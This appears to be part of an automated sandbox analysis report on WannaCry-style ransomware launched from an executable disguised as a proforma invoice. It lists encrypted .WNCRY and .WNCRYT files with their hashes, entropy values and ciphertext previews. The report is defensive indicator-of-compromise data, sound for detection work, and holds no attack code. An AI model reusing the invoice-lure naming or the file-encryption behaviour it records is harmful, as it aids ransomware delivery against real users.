                                                          SHA-512:05C5A4E6FB026CFAACBB50007B65FB4AD036D503AA532EF94F128FB02956E00F396988895AE9922D9CFA82AE4228CF4095AF504F9881865C46C10F56BE503CAF
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....!...#.~..p...C...g........m........E...2.H.,...|\hv..+X..tx.... .{>j..m1._...0.v..^.}.>.b8........0..d#I.m..o......9.{Et/.+.g.T.|........_...sE.....x'Ml......t..f......OP...........[.../.4.U)..Gb..~..M.c%..S.......g..-&..._...w.l.IF..p..<L..@e....7..........tE.1.8..Z..Bn.-I.&..|..gw.Q).V+CE...q.....(mu]^e.\....*.H.F..Z.R.6..G......L..3.=.h^OA..&).(.`.f.. e..L=gy."q..6.2..u....V.....>.C....?n..\c. .q.}.5R....M.u!.[(..d.Q$n..4%...U...[}%.t.X......._.....!.Q.n-....I...;...<1.6..e.].B#...DZ.J......>.Q..2.<...h...s....9:ltO..X....p.w.Ru.[. }...]E\O.......`.....g.X2...2G..O..5..R.gE...p.DZ....R...Ir...v...Y..........M).....P.....5..|o....L....#....e..-..'..h.iO*a...4....w..........l.p......*.!C.<.8k.f..+.{....R.5yZK.....L+2.o9<....P..Z....[....=..NJ....h/.b.......-^.q4.+g.....0.......hA..I'.O...zH.......c..1.}d.i.&..kxk..5.."8SCM.S.../..\..'.6l..iR..v....>C..V......h`[}k...%hi.....z...@.A.S/Rw.=hK.H..|(.}...g.#.v.&.G....EV....*Z0.4Xc

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133498763235716446.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):115064
                                                          Entropy (8bit):7.9984832785914035
                                                          Encrypted:true
                                                          SSDEEP:3072:ENMbR1itHx2YBnYkeKXoAqCnAGDSOttWEaMF91zuZxReKv0v:GMbmRjBnnqtOZF9duDReKvM
                                                          MD5:5D22AB7E460B15C3568490AD98523740
                                                          SHA1:508CE70BB0CF41AF6C8F9F2EBDBD9988E20483D8
                                                          SHA-256:04CB9CFE0B4A6BB1E1CAA31CE511769406C1935A229D60FF27B6C4DD7A1BA395
                                                          SHA-512:8C8FD74489C1F9354ACF7C69ECE2423A7286E52DCAAF41EFC9E6CA654E53306EC30422FB4CB5564D08B600AAE06682C3C786A853EF056471EE4359DE3D59B838
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!........<..s.....5y....|...2G.x".e./l.6{f.......(.3....M.=..F.....zoH...Y.c..L...c#...`...0X....Mtrn...5%..`;...7,j:..HsAK..o.}../.N5Z(.*.C.n..).Z&.......$RT.g.....}[..}.[|-..b'W.j...y..}..7p..._.$8.i.....w{..j1.........j.F.5w{.....=..P>.k.;!=S........S........Q0.).d9.x.....uL..az.v@.s..5..+0N..4r.$.i..i..J.7..@i49."..\h.......W.}.z/...Z....o.*4-6m..].wb|..8}}l.~.........:.......oa..C0b".8.!...j..d...._.m......W.. ..F......&o.._.>.k...6...i6.R..p.:..s..{..j..]]LD.I.$j._~}TV..gt.......B^..."+.9....T.8.6I.S.H.E..Z.....b1$..sA....e..`4..-..E.F...f!....0.(j.....{....Oq.dp.... ....lYi#.n......}.....N....2[c...m..S..0.[..<.X7..b58#.^~..4........~LH..N.....t!^.-.Qts......e)..'_..h.....g.k......d].|.....wz!.^P./..tp]i....6 ....2.....v<.<u.4...[.!..'...9...@88...N=....Q......{..9...B....C.#x5[|.....vE0...`..\.r.R...~1.0...b....r.....W}....D..sA%.$r...M....a`..../.<&.f......B......?TsY.....+h.c..9.28.1.F.`4...3...M.G.............G..[........8v

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133498763235716446.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):115064
                                                          Entropy (8bit):7.9984832785914035
                                                          Encrypted:true
                                                          SSDEEP:3072:ENMbR1itHx2YBnYkeKXoAqCnAGDSOttWEaMF91zuZxReKv0v:GMbmRjBnnqtOZF9duDReKvM
                                                          MD5:5D22AB7E460B15C3568490AD98523740
                                                          SHA1:508CE70BB0CF41AF6C8F9F2EBDBD9988E20483D8
                                                          SHA-256:04CB9CFE0B4A6BB1E1CAA31CE511769406C1935A229D60FF27B6C4DD7A1BA395
                                                          SHA-512:8C8FD74489C1F9354ACF7C69ECE2423A7286E52DCAAF41EFC9E6CA654E53306EC30422FB4CB5564D08B600AAE06682C3C786A853EF056471EE4359DE3D59B838
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!........<..s.....5y....|...2G.x".e./l.6{f.......(.3....M.=..F.....zoH...Y.c..L...c#...`...0X....Mtrn...5%..`;...7,j:..HsAK..o.}../.N5Z(.*.C.n..).Z&.......$RT.g.....}[..}.[|-..b'W.j...y..}..7p..._.$8.i.....w{..j1.........j.F.5w{.....=..P>.k.;!=S........S........Q0.).d9.x.....uL..az.v@.s..5..+0N..4r.$.i..i..J.7..@i49."..\h.......W.}.z/...Z....o.*4-6m..].wb|..8}}l.~.........:.......oa..C0b".8.!...j..d...._.m......W.. ..F......&o.._.>.k...6...i6.R..p.:..s..{..j..]]LD.I.$j._~}TV..gt.......B^..."+.9....T.8.6I.S.H.E..Z.....b1$..sA....e..`4..-..E.F...f!....0.(j.....{....Oq.dp.... ....lYi#.n......}.....N....2[c...m..S..0.[..<.X7..b58#.^~..4........~LH..N.....t!^.-.Qts......e)..'_..h.....g.k......d].|.....wz!.^P./..tp]i....6 ....2.....v<.<u.4...[.!..'...9...@88...N=....Q......{..9...B....C.#x5[|.....vE0...`..\.r.R...~1.0...b....r.....W}....D..sA%.$r...M....a`..../.<&.f......B......?TsY.....+h.c..9.28.1.F.`4...3...M.G.............G..[........8v

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133498763707955679.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):115064
                                                          Entropy (8bit):7.998327597829302
                                                          Encrypted:true
                                                          SSDEEP:3072:k8TSezC2UutoVSbJN5pu0cQ+K0cFroUdJ43BCfKRWrhXN:jGsC2SV+bpu0cY9rjs3BxWT
                                                          MD5:C250CF94847B623602743B7CA7B36002
                                                          SHA1:25F2AD3C936E281F671A63C4C90D7BC19F21CA20
                                                          SHA-256:848C5D2C502B0838E47D510275845BC5EC6BFABA2EB2B18A381DED48B699BB86
                                                          SHA-512:C124F0990D0DD0BDB3EFC3DA699F6139C4E4A361372690D58A341129464793C3EA360A8CB6204078EB84CC4B9EA876966D1FEC328A59E66EECED6A20084721B8
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....F.N8v.p.GjS...I..{.*..z.....R...{.)zhk._.g..Y............wTXX2?.gW.p..=.8...<.rJ....^^C@..UT8.2FN..$.L....*[..3..6.6.W.F.jg....y.on....Leo.....%..MF...c...<L.e.B.bi..42...!.f..8\25>+.t....D.>....#.%02c.....vO&.{....4..{.....1..63.R...'.(kI.QJ....Q...........f35".&.+B&.5.>5=.-._..;....N.....yspI.P./q..a.R.{F..-q...@.[5...Y..~....W#EkY/e..L.@.n\...x....j.z..(#..$..QG..kL...'......|O."<.W....8pq.....h...........}.....U'b/.>..g...$....,. ..:..Y6Y....?.#..@ZCP..p....W.F|...4K.Z.......)l.x.Z.:."Nz......a..o...\....6.e.`A........C.2...U..)Yn.6gz;.h7....'....4.O@..N.......'.|.4.r....$4....Z<.}..}..B...{........X...c..x.E..2ZG.............5..2."'.....(......L..~..~..~TD...s.%....=Y...j#......d...v{.o8....*.o-.G....YR0.'.a.%.ed....7)$.x.c." ._.]..OX..m....N....i5.D/.x<~x.&&.j.H.r*.7....KN.fZ.S...Y(0..0.V..q..t.J.p..v.8...@k. `:. :...../..s.....x..nkQ....Q...>..:...+..S..2.?..@....._...I6.......o~...7(L$.F/...b5.Ep..J$*..z.6|R..*.t.p.....5...

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133498763707955679.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):115064
                                                          Entropy (8bit):7.998327597829302
                                                          Encrypted:true
                                                          SSDEEP:3072:k8TSezC2UutoVSbJN5pu0cQ+K0cFroUdJ43BCfKRWrhXN:jGsC2SV+bpu0cY9rjs3BxWT
                                                          MD5:C250CF94847B623602743B7CA7B36002
                                                          SHA1:25F2AD3C936E281F671A63C4C90D7BC19F21CA20
                                                          SHA-256:848C5D2C502B0838E47D510275845BC5EC6BFABA2EB2B18A381DED48B699BB86
                                                          SHA-512:C124F0990D0DD0BDB3EFC3DA699F6139C4E4A361372690D58A341129464793C3EA360A8CB6204078EB84CC4B9EA876966D1FEC328A59E66EECED6A20084721B8
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....F.N8v.p.GjS...I..{.*..z.....R...{.)zhk._.g..Y............wTXX2?.gW.p..=.8...<.rJ....^^C@..UT8.2FN..$.L....*[..3..6.6.W.F.jg....y.on....Leo.....%..MF...c...<L.e.B.bi..42...!.f..8\25>+.t....D.>....#.%02c.....vO&.{....4..{.....1..63.R...'.(kI.QJ....Q...........f35".&.+B&.5.>5=.-._..;....N.....yspI.P./q..a.R.{F..-q...@.[5...Y..~....W#EkY/e..L.@.n\...x....j.z..(#..$..QG..kL...'......|O."<.W....8pq.....h...........}.....U'b/.>..g...$....,. ..:..Y6Y....?.#..@ZCP..p....W.F|...4K.Z.......)l.x.Z.:."Nz......a..o...\....6.e.`A........C.2...U..)Yn.6gz;.h7....'....4.O@..N.......'.|.4.r....$4....Z<.}..}..B...{........X...c..x.E..2ZG.............5..2."'.....(......L..~..~..~TD...s.%....=Y...j#......d...v{.o8....*.o-.G....YR0.'.a.%.ed....7)$.x.c." ._.]..OX..m....N....i5.D/.x<~x.&&.j.H.r*.7....KN.fZ.S...Y(0..0.V..q..t.J.p..v.8...@k. `:. :...../..s.....x..nkQ....Q...>..:...+..S..2.?..@....._...I6.......o~...7(L$.F/...b5.Ep..J$*..z.6|R..*.t.p.....5...

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):696888
                                                          Entropy (8bit):7.999732693480322
                                                          Encrypted:true
                                                          SSDEEP:12288:50NvSLLqv8aIjZf+4gRhaOn7mKxjkP/3INfomIPsOkposo2KAVz:505SfiURaD7jk3RkKDNSz
                                                          MD5:6C68538F99383D1FA2DDC23D2859E65F
                                                          SHA1:0CE58FADA992FB83ECA56E7364164AE8BB26B475
                                                          SHA-256:BEECA85A5D14071DF4868E3CED0A003F9181F4C4DB05681855A00735A862BCC0
                                                          SHA-512:B6D6A6694D832A963805984447EB46A4BBDCA07046B6A0A940F73D65931E3C2C64C6C6A295FCF46641E9F64C4736EE45F08D0233BA01011A7A8B9A8E1C006334
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....|.p.Wqz:..%@.l....5&...h.......u.A.7..hY0N.a...m=.y5O...zZ..F......~S.!...0....>.kr+......|1..v..:^...y.F?3..o.z.E..Vm....1....k...5....-...v..*..G...]...um...k.....NT.".G.......NY.X.+gH..@......!.vl.w....$^-.OJ.?5..B.t..G........f=.(.2..............c..F@TJ&. ........D9n...AX....a.a...........q......./...=..DE..b..b....K..#1[.?.'Q.JNQ..lz.dr.17...2. .6..Qp.6.g...=.F..B{..L.?f...c..5,.`..][..;.......e.......$...x.c..x.9.e..O..P.....z..c.&.8..Y...;B .@.E...l...k@..eF...4.Z=....8.._.~..{.b.0=.O..Tr...i5..z.L.....p)..}HD<.P..$..H........c.Y...bcsG...^....Mo9$..C.1,.8.y.L=".......}&..{.)<..q.T..I..A....H.P..,.V."........t.o...#..3S.]nO.NPB..[...t....W.....0v...*...yfy.7L.v.7.7....;A..o..)....'..C......>.(.....m.D.4.#.d......Vv..ABy....[>...U...N&.2.W...'.[....I.d..<.....N...$.D....0B d&|...Mw.`..+...x.1A...&.1%._..8...X.....5..>.z/...b..R..U.S\.c.eO..c&VVm..^iG.C.......,r.............R1N...s.4.....L...c....3.&..;.(50......6.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):696888
                                                          Entropy (8bit):7.999732693480322
                                                          Encrypted:true
                                                          SSDEEP:12288:50NvSLLqv8aIjZf+4gRhaOn7mKxjkP/3INfomIPsOkposo2KAVz:505SfiURaD7jk3RkKDNSz
                                                          MD5:6C68538F99383D1FA2DDC23D2859E65F
                                                          SHA1:0CE58FADA992FB83ECA56E7364164AE8BB26B475
                                                          SHA-256:BEECA85A5D14071DF4868E3CED0A003F9181F4C4DB05681855A00735A862BCC0
                                                          SHA-512:B6D6A6694D832A963805984447EB46A4BBDCA07046B6A0A940F73D65931E3C2C64C6C6A295FCF46641E9F64C4736EE45F08D0233BA01011A7A8B9A8E1C006334
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....|.p.Wqz:..%@.l....5&...h.......u.A.7..hY0N.a...m=.y5O...zZ..F......~S.!...0....>.kr+......|1..v..:^...y.F?3..o.z.E..Vm....1....k...5....-...v..*..G...]...um...k.....NT.".G.......NY.X.+gH..@......!.vl.w....$^-.OJ.?5..B.t..G........f=.(.2..............c..F@TJ&. ........D9n...AX....a.a...........q......./...=..DE..b..b....K..#1[.?.'Q.JNQ..lz.dr.17...2. .6..Qp.6.g...=.F..B{..L.?f...c..5,.`..][..;.......e.......$...x.c..x.9.e..O..P.....z..c.&.8..Y...;B .@.E...l...k@..eF...4.Z=....8.._.~..{.b.0=.O..Tr...i5..z.L.....p)..}HD<.P..$..H........c.Y...bcsG...^....Mo9$..C.1,.8.y.L=".......}&..{.)<..q.T..I..A....H.P..,.V."........t.o...#..3S.]nO.NPB..[...t....W.....0v...*...yfy.7L.v.7.7....;A..o..)....'..C......>.(.....m.D.4.#.d......Vv..ABy....[>...U...N&.2.W...'.[....I.d..<.....N...$.D....0B d&|...Mw.`..+...x.1A...&.1%._..8...X.....5..>.z/...b..R..U.S\.c.eO..c&VVm..^iG.C.......,r.............R1N...s.4.....L...c....3.&..;.(50......6.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\GLEAM-DARK.svg.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):103448
                                                          Entropy (8bit):7.998117607841535
                                                          Encrypted:true
                                                          SSDEEP:3072:TlGvQZ1Ep45Xn3DyppSjDcJepzIFVHmGwy+G7iCNBOtbzP8D6gc:TlGkuoXn32K9IdwxGmbzPQ6gc
                                                          MD5:DB23DE29E689511FD73CA4A7C00BE1BB
                                                          SHA1:C8B0FB79496460BB09A1965AAD9BC5FC4F9492BA
                                                          SHA-256:5A3E9D53B5440C235E52927EA7D5CD76DA025492ACD38F6CC1AF6B0E3FAD2C9E
                                                          SHA-512:A40E4909AA76A886BD9B5B223E6C45D177705A5F16DD45349744EC24CB9CAC46F133271488614A7B1884B99AEAB3F510A936DBEEA37930559AAA6FBBF6E63500
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....$a......k..e..J.j.k.*.Z...?.O...B$.f.-.....e.(...g.R.....[~3.A..>N.;.t......'yx.....J.V.{.BtmZ.-...aaA...t.Y.Zr..x+...19..;U..2.g........%Hd.J......"!rl.....N..?...cjC........._0.,...u..)tV..5.^<.n.1L....zbf..@.....w_SdO..|...~......itm................~&..H..z.:D4...#.@...q....E$...n.....z:.u..V..Y..."..r..v|...=g e$..B7..J...}.5.HS.|..."..x.*W.*|.J..ku..sQ...Z......d&`..&.O.O.rzq....x.....8....f(.\./...8..e....Z......t.3..........}...S^...u..4...i&.3...QL.RP.3TX"i.Q.A.0..S.....3....|.4.].......d....Y.........6.K...w...$..y.s....Z...2......e.g./k.!.. .N1....z.8...^..z....E....t..........~~N5.J.c....g....;......t..YT..D...C.y,<-H`...x. ..j....`...^/..s.Uqm.q.5.6q.^.,.@!.......`.(/.:E...6y.D.k...{U{...k.a.S.....g.1`..L2RV..V..!m\....i.j.7..}.b.9.>{...WA.+N.....q...W.kpB....(.@~l5...W..@.ji^e..h.)...s.Ks5z.t|...Ig#.\..8....._R.}.....NM.H.dY.<..........~IX....0..$qn\.R6....l4....$.kl8R....6..5...@..N.i..N..M,...j..b..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\GLEAM-DARK.svg.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):103448
                                                          Entropy (8bit):7.998117607841535
                                                          Encrypted:true
                                                          SSDEEP:3072:TlGvQZ1Ep45Xn3DyppSjDcJepzIFVHmGwy+G7iCNBOtbzP8D6gc:TlGkuoXn32K9IdwxGmbzPQ6gc
                                                          MD5:DB23DE29E689511FD73CA4A7C00BE1BB
                                                          SHA1:C8B0FB79496460BB09A1965AAD9BC5FC4F9492BA
                                                          SHA-256:5A3E9D53B5440C235E52927EA7D5CD76DA025492ACD38F6CC1AF6B0E3FAD2C9E
                                                          SHA-512:A40E4909AA76A886BD9B5B223E6C45D177705A5F16DD45349744EC24CB9CAC46F133271488614A7B1884B99AEAB3F510A936DBEEA37930559AAA6FBBF6E63500
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....$a......k..e..J.j.k.*.Z...?.O...B$.f.-.....e.(...g.R.....[~3.A..>N.;.t......'yx.....J.V.{.BtmZ.-...aaA...t.Y.Zr..x+...19..;U..2.g........%Hd.J......"!rl.....N..?...cjC........._0.,...u..)tV..5.^<.n.1L....zbf..@.....w_SdO..|...~......itm................~&..H..z.:D4...#.@...q....E$...n.....z:.u..V..Y..."..r..v|...=g e$..B7..J...}.5.HS.|..."..x.*W.*|.J..ku..sQ...Z......d&`..&.O.O.rzq....x.....8....f(.\./...8..e....Z......t.3..........}...S^...u..4...i&.3...QL.RP.3TX"i.Q.A.0..S.....3....|.4.].......d....Y.........6.K...w...$..y.s....Z...2......e.g./k.!.. .N1....z.8...^..z....E....t..........~~N5.J.c....g....;......t..YT..D...C.y,<-H`...x. ..j....`...^/..s.Uqm.q.5.6q.^.,.@!.......`.(/.:E...6y.D.k...{U{...k.a.S.....g.1`..L2RV..V..!m\....i.j.7..}.b.9.>{...WA.+N.....q...W.kpB....(.@~l5...W..@.ji^e..h.)...s.Ks5z.t|...Ig#.\..8....._R.}.....NM.H.dY.<..........~IX....0..$qn\.R6....l4....$.kl8R....6..5...@..N.i..N..M,...j..b..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\GLEAM-LIGHT.svg.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):112328
                                                          Entropy (8bit):7.998295370329084
                                                          Encrypted:true
                                                          SSDEEP:1536:TaS9MCubz9SAxvvmoTqiBGtPtP4F2fXzXxkvvCdshEiOQwPompBfIZ1h731/a6X5:TaV7VrZqwyq2fjkvCdsh6btB4Hx/zX5
                                                          MD5:75A4E539DA25D77DD9A8C2BA28265B6B
                                                          SHA1:B9003F22520297C8255BCA2817C261DE114DDAF2
                                                          SHA-256:22781BF66404176C8D67B8ED2BF9E6153491F80067BFE840879606DDB9E35C06
                                                          SHA-512:D45B9707E33DC963E76EE92EE1F10C0B4C2B29157127B0495E51F88A2CBFA1863A59E2989199FC826C36FE51055D08B8E352F21D043CCB078A271A5D7B33D144
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......9$...{.V.0...T....2.6.W..w?.i....C.g...>..d.....%.vr\...1..&4+...@.+...]Z2.....6.]...........5.HM^.D~]..1.......G..o|....3Kh.r.eZ9L..^.tV.....gx.vt.l_z.1.V..k.....Q\.......c........Z..9........l..dq*.....O.&.D.z...l...H2^m]..=#.......n..m.................%l/=....id....z................].(..q.........hPg.&.I..}hR.....`o.D..m.%PZ..6..=...i.d..j..j..:]}.Zl..l.........!.a{.eNfsU.... .J#.y]..w.....p..H#.:..7G[.......,)..... ...JV...}.4W..?C.f3,.h.R.3.....>....K...bF...\..oc...=f2l.....u....[V......+L.j..........4.cS.8A...~..6.<..&yo!y."..!O.:.2..,=q..n......Q7*.~....K)d... /..wn....RkX7........I....m..$.+Z0.#.`.78-uo........v.40.............#...1...F..G.....!..e..s.H."...._./...Z.w..F.S....8........`.e.,$S.T[.}(.....(.T.*....7...'3.i...6...."...u...<ha.'.......m..+...z..jP.M.........iQ(...4..........\...Le.._.5.,........K...(e..:q.dz.hN..j..^9R.vv2QQP......5H`...OG..&.!.*...z...T9p..`.t..K.7Z..;N.R....O>..N.9N78&.".>...

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\GLEAM-LIGHT.svg.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):112328
                                                          Entropy (8bit):7.998295370329084
                                                          Encrypted:true
                                                          SSDEEP:1536:TaS9MCubz9SAxvvmoTqiBGtPtP4F2fXzXxkvvCdshEiOQwPompBfIZ1h731/a6X5:TaV7VrZqwyq2fjkvCdsh6btB4Hx/zX5
                                                          MD5:75A4E539DA25D77DD9A8C2BA28265B6B
                                                          SHA1:B9003F22520297C8255BCA2817C261DE114DDAF2
                                                          SHA-256:22781BF66404176C8D67B8ED2BF9E6153491F80067BFE840879606DDB9E35C06
                                                          SHA-512:D45B9707E33DC963E76EE92EE1F10C0B4C2B29157127B0495E51F88A2CBFA1863A59E2989199FC826C36FE51055D08B8E352F21D043CCB078A271A5D7B33D144
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......9$...{.V.0...T....2.6.W..w?.i....C.g...>..d.....%.vr\...1..&4+...@.+...]Z2.....6.]...........5.HM^.D~]..1.......G..o|....3Kh.r.eZ9L..^.tV.....gx.vt.l_z.1.V..k.....Q\.......c........Z..9........l..dq*.....O.&.D.z...l...H2^m]..=#.......n..m.................%l/=....id....z................].(..q.........hPg.&.I..}hR.....`o.D..m.%PZ..6..=...i.d..j..j..:]}.Zl..l.........!.a{.eNfsU.... .J#.y]..w.....p..H#.:..7G[.......,)..... ...JV...}.4W..?C.f3,.h.R.3.....>....K...bF...\..oc...=f2l.....u....[V......+L.j..........4.cS.8A...~..6.<..&yo!y."..!O.:.2..,=q..n......Q7*.~....K)d... /..wn....RkX7........I....m..$.+Z0.#.`.78-uo........v.40.............#...1...F..G.....!..e..s.H."...._./...Z.w..F.S....8........`.e.,$S.T[.}(.....(.T.*....7...'3.i...6...."...u...<ha.'.......m..+...z..jP.M.........iQ(...4..........\...Le.._.5.,........K...(e..:q.dz.hN..j..^9R.vv2QQP......5H`...OG..&.!.*...z...T9p..`.t..K.7Z..;N.R....O>..N.9N78&.".>...

                                                          C:\Users\user\AppData\Local\Temp\0.WNCRYT (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:OpenPGP Secret Key
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.818964312449045
                                                          Encrypted:false
                                                          SSDEEP:24:E0K1eCqnPNivBFTim1KhKRtmSiykM0mlSkpTEjNTg/kkdf:lK8JFi7um1QKjBiykmlSkpTEtmf
                                                          MD5:693AC9ED94F92B2C19E1738ED459B007
                                                          SHA1:02B6C15A208B38D7181DE3417077886444E6B351
                                                          SHA-256:0F91E5493EF4D233510B4EB0A4301120B68BA60511C89DA8A462D2E491FDC096
                                                          SHA-512:9ADD0AAB299EA1C30E4B672697237F4773742CC766E55C72DCF6C50900F03CC42FCE0647CCC5929EF5506770DEEB6CFA427B83E8D50041C316A4ED532DD859FA
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:...:.@.........-.s3.{,.....j.....]b.AU&........=.-7.^...........U.A.~G.YD...^....].u...W_.#%...!....j.P2.hK!....B...h1-.....A..I...1.8.Q..gS.+.....F.e(p7..Ad...>..m]8u....KYd.lcf.W/.]S.n...6...$.y.7"..+.s.Ix.......v.|.v...^..K.{s.V{..=.V....U`...... L.J....&....P..*7.A..}......).g...U$.....c2).-R=2...E].f'&.q.OD ..\F.'l.S...5%.[.....5...l0=....r.Z.bz.l...#2..R.D.JK".}..................[...P".z.n+....@....a.lyF..h..FGw..!.....}..,.h...M"J.Y.iK]....Y=N....41.Po.d...@./\..0.5.T.+<......[.`...qaq...E[A.$.....lh...)..... ..4*.N..A.....g4.....YY.1..9X.o..o{....J..}J:.E.I"v.P..F`.M...Q.|.y..t.g2<......S..v..`.v!?..t.$.Z......8....].A.;.@.|Z.u..;.u.!..'.@"n....^...7.........n.Aj}M..?W.O.....^...~,.0.z..y....<.C...-H.>tX...*$;..R..a7A.?..Eh...;....?$..]|...pO...fGe6.....h..F.........X.TAa.x.M...V.|..Le ....5Ml#...Y......B>.r...4../...N.@.v...9H..D#V..e...D....[....6.A;v.J$..0q...c&....%.x.~wR.Ap...r..d.b....?}.x..J..EtV`.xh."E...1.".-..<L..ar

                                                          C:\Users\user\AppData\Local\Temp\1.WNCRYT (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.781409953882536
                                                          Encrypted:false
                                                          SSDEEP:24:pT2h3DHzKBlJ9ahlg9HsYGNrOL03LkYr2bOljU4S5XKV:pEDoJ9Og9yAApqOjtL
                                                          MD5:5F1B4D658538AB62FC6B74552BC3FB94
                                                          SHA1:6744674F0145918AE65BDDCAADBA9A3BAB1ECD77
                                                          SHA-256:D829E74D741B08C7D2FC1BAE8FAF68B8818C255A84A823B839CC0806C6831BB4
                                                          SHA-512:4CD51F4E378ADEEEB3807C9C0C5662A97142899E9A7E29324BBAC369A0ED444C60D925B4BEB1F8353723CAC95D2127CE2151CB413BC33DC12C0057F73714C22E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:0c.J`~.d...\.'..v.....K@f..H...&.&.'..T....t..I...!.shN/y.J9Z..........IN..DYw........c...E.k..U....th%+...6.7...v...&6...D..a...A. .k.O=K\H.M....y\.+.b..C.i..@...1.Vt....G4.d.QH](2..L.U>..l.T.."cN?.,,.L..W".d.....................}f............E.Y......r.+.#Q8.......C....3.!.>........8B.H.>r...,..x[;Tm!_.7.,.1.....a...p...E.."...C.....e..@ut.$..b.Y.._.bB.....w.U...\Q?...._]........_.....ja_...X..\..Ar..i..I.[..6y......a.${").....8.OpN..^...b.5J/8.3....4...3.|},n5...zI.=>t..k.iZ.^eT.....b..G.....`Fo`..+{l.h.>..u..GT!.......3.=............F.j.-+....X9....M.c...........|<...1..Y.G......o.1..{..Z^..1...I....W6.9..df..4..KL.........X.B.xg)......s.....V.....1L.k....g....J.p.\..#QO,_.az3'[Q.\t.....s.....1.$.VB./.q=Wl-.2......+lF.B^S.B...y........S ...n1#+<\w.3>l..aY2.|.3ia...........3._.@8.R........X...Zp.v~.\..I..&....e.4.+.."C`..6........:..!.Px.Y..k.,...Zh..SC....T....m........a.a6....H....k..^{..`&_..z..L|.9e...F.qL..#...y....

                                                          C:\Users\user\AppData\Local\Temp\10.WNCRYT (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.805978454846127
                                                          Encrypted:false
                                                          SSDEEP:24:a7cO8nBhz6c+Oi8A6NNJWm6ls+ARqn/nlCPavz8nPFL6P8j/Qi:TBh71Ak38IRqvPz2PFuPGJ
                                                          MD5:E7112335E77422948BCC9368881622B6
                                                          SHA1:655BA1F63612E543FD27208F4BD7C638659C24B4
                                                          SHA-256:72FAF407EEA25E5097ACEB8904973F152F89DDE6438BAF7D9FD3E57C0B9E3BDC
                                                          SHA-512:7A937060DEF53F3E397BB0337DC53BE2A201BAA0190D618B84D27EF927BD484444C17A021387013558443C65C90A77B2D6A14274E60E61C60CA5BBA2003272E7
